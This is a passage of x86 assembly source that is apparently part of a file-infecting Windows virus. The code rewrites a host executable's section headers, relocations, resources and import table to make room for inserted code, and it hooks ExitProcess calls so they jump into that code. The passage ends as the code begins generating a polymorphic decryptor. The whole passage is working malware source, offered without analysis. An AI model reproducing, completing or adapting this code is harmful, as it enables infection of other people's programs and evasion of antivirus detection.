ebx, 0FFFFh add edx, 2 cmp ebx, 2FFFh jbe @@LoopUpdate_01 and ebx, 0FFFh add ebx, [eax] mov esi, [ebp+MakingFirstHole] or esi, esi jnz @@UpdateCodeSec_Cont00 cmp ebx, [ebp+RVA_TextHole] jb @@UpdateCodeSec_Cont00 add ebx, [ebp+TextHoleSize] @@UpdateCodeSec_Cont00: call TranslateVirtualToPhysical or ebx, ebx jz @@LoopUpdate_01 push eax push edx mov eax, [ebp+HeaderAddress] mov edx, [ebx] sub edx, [eax+34h] cmp edx, edi jb @@TranslateOK_02 add [ebx], ecx add edx, ecx @@TranslateOK_02: mov esi, [ebx-2] and esi, 0FFFFh cmp esi, 15FFh jz @@CheckExitProcess cmp esi, 25FFh jnz @@ItsNotExitProcess @@CheckExitProcess: cmp edx, [ebp+ExitProcessAddress] jnz @@ItsNotExitProcess mov edx, [ebp+HeaderAddress] mov edx, [edx+34h] add edx, edi push esi mov esi, ebx call PatchExitProcess pop esi xor eax, eax pop edx pop eax push eax add eax, edx push edx mov edx, [eax-2] and edx, 0FFFF0000h mov [eax-2], edx pop edx pop eax jmp @@LoopUpdate_01 @@ItsNotExitProcess: @@TranslateOK: pop edx pop eax jmp @@LoopUpdate_01 @@PageUpdated: add eax, [eax+4] jmp @@LoopUpdate_00 @@AllUpdated: pop esi mov eax, [ebp+MakingFirstHole] mov ebx, [ebp+HeaderAddress] cmp [ebx+0Ch], edi jb @@Fixed_01 or eax, eax jnz @@NotFixed_01 cmp [ebx+0Ch], edi jz @@Fixed_01 @@NotFixed_01: add [ebx+0Ch], ecx @@Fixed_01: cmp [ebx+28h], edi jb @@Fixed_02 or eax, eax jnz @@NotFixed_02 cmp [ebx+28h], edi jz @@Fixed_02 @@NotFixed_02: add [ebx+28h], ecx @@Fixed_02: cmp [ebx+2Ch], edi jb @@Fixed_03 or eax, eax jnz @@NotFixed_03 cmp [ebx+2Ch], edi jz @@Fixed_03 @@NotFixed_03: add [ebx+2Ch], ecx @@Fixed_03: cmp [ebx+30h], edi jb @@Fixed_04 or eax, eax jnz @@NotFixed_04 cmp [ebx+30h], edi jz @@Fixed_04 @@NotFixed_04: add [ebx+30h], ecx @@Fixed_04: add [ebx+50h], ecx mov edx, [ebp+HeaderAddress] mov edx, [edx+74h] mov ebx, [ebp+HeaderAddress] add ebx, 78h xor eax, eax @@LoopDir_01: cmp eax, 4 jz @@NextDir_01 cmp [ebx], edi jb @@NextDir_01 add [ebx], ecx @@NextDir_01: add ebx, 8 inc eax dec edx or edx, edx jnz @@LoopDir_01 mov edx, [ebp+StartOfSectionHeaders] mov ebx, [esi+14h] mov eax, [ebp+MakingFirstHole] or eax, eax jz @@MakingDataHole_2 @@MakingCodeHole_2: add ebx, [esi+10h] @@MakingDataHole_2: mov eax, [ebp+HeaderAddress] mov eax, [eax+6] and eax, 0FFFFh push esi mov esi, [ebp+MakingFirstHole] @@LoopUpdate_02: push eax mov eax, [edx+14h] cmp eax, ebx jb @@NextSection_00 or esi, esi jnz @@NextSection_00_ cmp eax, ebx jz @@NextSection_00 @@NextSection_00_: add eax, ecx mov [edx+14h], eax @@NextSection_00: mov eax, [edx+0Ch] cmp eax, edi jb @@NextSection_01 or esi, esi jnz @@NextSection_01_ cmp eax, edi jz @@NextSection_01 @@NextSection_01_: add eax, ecx mov [edx+0Ch], eax @@NextSection_01: pop eax add edx, 28h dec eax or eax, eax jnz @@LoopUpdate_02 pop esi add [esi+08h], ecx add [esi+10h], ecx cmp esi, [ebp+RelocHeader] jz @@End push ecx push ebx mov edx, [ebp+MappingAddress] add edx, [ebp+FileSize] sub edx, 4 mov edi, edx add edi, ecx pop ecx add ecx, [ebp+MappingAddress] @@Again: mov eax, [edx] mov [edi], eax sub edx, 4 sub edi, 4 cmp edx, ecx jae @@Again pop ecx and ecx, 0FFFFFFFCh shr ecx, 2 add edx, 4 @@Again2: call Random and eax, 0FCh mov [edx], eax add edx, 4 dec ecx or ecx, ecx jnz @@Again2 @@End: pop eax pop edi mov ecx, 0 pop ecx ret UpdateHeaders endp UpdateResourceDir proc @@UpdateResourceDir2: push eax mov eax, [eax+4] and eax, 80000000h or eax, eax jz @@UpdateData pop eax push eax mov eax, [eax+4] and eax, 7FFFFFFFh add eax, ebx push edx push eax mov edx, [eax+0Ch] and edx, 0FFFFh mov eax, [eax+0Eh] and eax, 0FFFFh add edx, eax pop eax add eax, 10h call @@UpdateResourceDir2 pop edx jmp @@NextDir @@UpdateData: pop eax push eax mov eax, [eax+4] add eax, ebx mov eax, [eax] cmp eax, edi jb @@UpdateOK pop eax push eax mov eax, [eax+4] add eax, ebx push ebx mov ebx, eax call AddUndoAction pop ebx add [eax], ecx @@UpdateOK: @@NextDir: pop eax add eax, 8 dec edx or edx, edx jnz @@UpdateResourceDir2 ret UpdateResourceDir endp TranslateVirtualToPhysical proc push ecx or ebx, ebx jz @@Error mov ecx, [ebp+HeaderAddress] mov ecx, [ecx+6] and ecx, 0FFFFh push edx mov edx, [ebp+StartOfSectionHeaders] push eax @@LoopSection: mov eax, [edx+0Ch] cmp ebx, eax jb @@NextSection add eax, [edx+10h] cmp ebx, eax jae @@NextSection sub ebx, [edx+0Ch] add ebx, [edx+14h] pop eax pop edx add ebx, [ebp+MappingAddress] pop ecx ret @@NextSection: add edx, 28h dec ecx or ecx, ecx jnz @@LoopSection pop eax pop edx @@Error: xor ebx, ebx pop ecx ret TranslateVirtualToPhysical endp UpdateImports proc push esi mov eax, [ebp+HeaderAddress] mov ebx, [eax+80h] or ebx, ebx jz @@ImportsUpdated call TranslateVirtualToPhysical or ebx, ebx jz @@ImportsUpdated @@UpdateImports_Loop00: mov eax, [ebx+0Ch] or eax, eax jz @@ImportsUpdated cmp eax, edi jb @@UpdateImportsOK_01 add ebx, 0Ch call AddUndoAction add [ebx], ecx sub ebx, 0Ch @@UpdateImportsOK_01: push ebx xor ebx, ebx mov [ebp+Kernel32Imports], ebx mov ebx, eax call TranslateVirtualToPhysical or ebx, ebx jz @@UpdateImports_Next00 mov eax, [ebx] and eax, 1F1F1F1Fh cmp eax, 'nrek' AND 1F1F1F1Fh jnz @@UpdateImports_Next00 mov eax, [ebx+4] and eax, 0FFFF1F1Fh cmp eax, '23le' AND 0FFFF1F1Fh jnz @@UpdateImports_Next00 mov eax, 1 mov [ebp+Kernel32Imports], eax @@UpdateImports_Next00: pop ebx mov eax, [ebx] or eax, eax jz @@UpdateImportsOK_04 push ebx mov ebx, eax call TranslateVirtualToPhysical mov eax, ebx pop ebx or eax, eax jz @@UpdateImportsOK_04 @@UpdateImports_Loop01: mov edx, [eax] or edx, edx jz @@UpdateImportsOK_02 cmp edx, 80000000h jae @@UpdateImports_UpdatedOK mov esi, [ebp+Kernel32Imports] or esi, esi jz @@UpdateImports_NotKernel32 push ebx mov ebx, edx call TranslateVirtualToPhysical or ebx, ebx jz @@UpdateImports_UnknownFunction mov esi, [ebx+2] cmp esi, 'tixE' jz @@UpdateImports_ExitProcess00 cmp esi, 'MteG' jz @@UpdateImports_GetModuleHandle00 cmp esi, 'PteG' jz @@UpdateImports_GetProcAddress00 cmp esi, 'triV' jnz @@UpdateImports_UnknownFunction @@UpdateImports_VirtualAlloc: mov esi, [ebx+0Bh] cmp esi, 'loc' jnz @@UpdateImports_UnknownFunction xor esi, esi jmp @@UpdateImports_SaveFunctionAddress @@UpdateImports_GetProcAddress00: mov esi, [ebx+6] cmp esi, 'Acor' jnz @@UpdateImports_UnknownFunction mov esi, 1 jmp @@UpdateImports_SaveFunctionAddress @@UpdateImports_ExitProcess00: mov esi, [ebx+6] cmp esi, 'corP' jnz @@UpdateImports_UnknownFunction mov esi, 2 jmp @@UpdateImports_SaveFunctionAddress @@UpdateImports_GetModuleHandle00: mov esi, [ebx+0Ah] cmp esi, 'naHe' jnz @@UpdateImports_UnknownFunction mov esi, [ebx+0Eh] cmp esi, 'Aeld' jz @@UpdateImports_GetModuleHandleAFound cmp esi, 'Weld' jnz @@UpdateImports_UnknownFunction mov esi, 1 jmp @@UpdateImports_GetModuleHandleFound @@UpdateImports_GetModuleHandleAFound: xor esi, esi @@UpdateImports_GetModuleHandleFound: mov [ebp+GetModuleHandleMode], esi mov esi, 3 @@UpdateImports_SaveFunctionAddress: pop ebx push ebx push eax push ebx mov ebx, [ebx] call TranslateVirtualToPhysical sub eax, ebx pop ebx add eax, [ebx+10h] cmp eax, edi jb @@UpdateImports_SetFunctionAddress add eax, ecx @@UpdateImports_SetFunctionAddress: or esi, esi jz @@UpdateImports_SetVirtualAlloc cmp esi, 1 jz @@UpdateImports_SetGetProcAddress cmp esi, 2 jz @@UpdateImports_SetExitProcess @@UpdateImports_SetGetModuleHandle: mov [ebp+GetModuleHandleAddress], eax jmp @@UpdateImports_FunctionSet @@UpdateImports_SetVirtualAlloc: mov [ebp+VirtualAllocAddress], eax jmp @@UpdateImports_FunctionSet @@UpdateImports_SetGetProcAddress: mov [ebp+GetProcAddressAddress], eax jmp @@UpdateImports_FunctionSet @@UpdateImports_SetExitProcess: mov [ebp+ExitProcessAddress], eax @@UpdateImports_FunctionSet: pop eax @@UpdateImports_UnknownFunction: @@UpdateImports_Continue00: pop ebx @@UpdateImports_NotKernel32: cmp edx, edi jb @@UpdateImports_UpdatedOK push ebx mov ebx, eax call AddUndoAction pop ebx add [eax], ecx @@UpdateImports_UpdatedOK: add eax, 4 jmp @@UpdateImports_Loop01 @@UpdateImportsOK_02: mov eax, [ebx] cmp eax, edi jb @@UpdateImportsOK_03 call AddUndoAction add [ebx], ecx @@UpdateImportsOK_03: add ebx, 10h mov eax, [ebx] cmp eax, edi jb @@UpdateImportsOK_04_ call AddUndoAction add eax, ecx mov [ebx], eax sub eax, ecx @@UpdateImportsOK_04_: sub ebx, 10h @@UpdateImportsOK_04: add ebx, 14h jmp @@UpdateImports_Loop00 @@ImportsUpdated: pop esi ret UpdateImports endp PatchExitProcess proc push eax mov eax, 1 call Random and eax, 1 jz @@PUSHRET @@IndirectDisplacement: push ecx mov eax, [ebp+TextHeader] mov ecx, [eax+10h] mov eax, [eax+14h] add eax, [ebp+MappingAddress] push edx sub ecx, 4 @@LoopFindHole: sub ecx, 1 or ecx, ecx jz @@NotFound mov edx, [eax] cmp edx, 0CCCCCCCCh jz @@HoleFound add eax, 1 jmp @@LoopFindHole @@NotFound: pop edx pop ecx jmp @@PUSHRET @@HoleFound: pop edx mov [eax], edx mov ecx, [esi+4] and ecx, 0FFh cmp ecx, 0C3h jz @@RetInserted sub eax, [ebp+MappingAddress] mov ecx, [ebp+TextHeader] sub eax, [ecx+14h] add eax, [ecx+0Ch] mov ecx, [ebp+HeaderAddress] add eax, [ecx+34h] mov [esi], eax mov eax, 25h mov [esi-1], al pop ecx jmp @@Return @@RetInserted: mov eax, 35h mov [esi-1], al pop ecx jmp @@Return @@PUSHRET: mov eax, 68h mov [esi-2], eax mov [esi-1], edx mov eax, 0C3h mov [esi+3], al @@Return: pop eax ret PatchExitProcess endp AddUndoAction proc push edx mov edx, [ebp+MakingFirstHole] or edx, edx jz @@Return push eax mov edx, [ebp+NumberOfUndoActions] add edx, [ebp+OtherBuffers] mov [edx], ebx mov eax, [ebx] mov [edx+4], eax add edx, 8 sub edx, [ebp+OtherBuffers] mov [ebp+NumberOfUndoActions], edx pop eax @@Return: pop edx ret AddUndoAction endp UndoChanges proc mov edx, [ebp+NumberOfUndoActions] or edx, edx jz @@Ret mov ecx, edx sub edx, 8 add edx, [ebp+OtherBuffers] @@Loop01: mov ebx, [edx] mov eax, [edx+4] mov [ebx], eax sub edx, 8 sub ecx, 8 or ecx, ecx jnz @@Loop01 @@Ret: ret UndoChanges endp APICall_GetModuleHandle proc mov eax, [ebp+FlagAorW] or eax, eax jz @@UseGMHA mov ebx, edx add ebx, 20h mov ebx, edx add ecx, 10h @@LoopConvertToWideChar: mov eax, [ecx] and eax, 0FFh mov [ebx], eax sub ecx, 1 sub ebx, 2 cmp ecx, edx jnz @@LoopConvertToWideChar @@UseGMHA: push edx call dword ptr [ebp+RVA_GetModuleHandle] mov [ebp+ReturnValue], eax ret APICall_GetModuleHandle endp GetFunction proc push eax push ecx push edx mov eax, edx push eax mov eax, edi push eax call dword ptr [ebp+RVA_GetProcAddress] mov [ebp+ReturnValue], eax pop edx pop ecx pop eax mov eax, [ebp+ReturnValue] ret GetFunction endp ;---------------------------------------------------------------------------------------- MakeDecryptor proc mov [ebp+InstructionTable], edi xor eax, eax mov [ebp+NumberOfLabels], eax mov [ebp+NumberOfVariables], eax mov eax, edi add eax, 80000h mov [ebp+ExpansionResult], eax mov eax, [ebp+RVA_DataHole] mov ecx, [ebp+HeaderAddress] add eax, [ecx+34h] mov [ebp+StartOfEncryptedData], eax mov edx, [ebp+Relo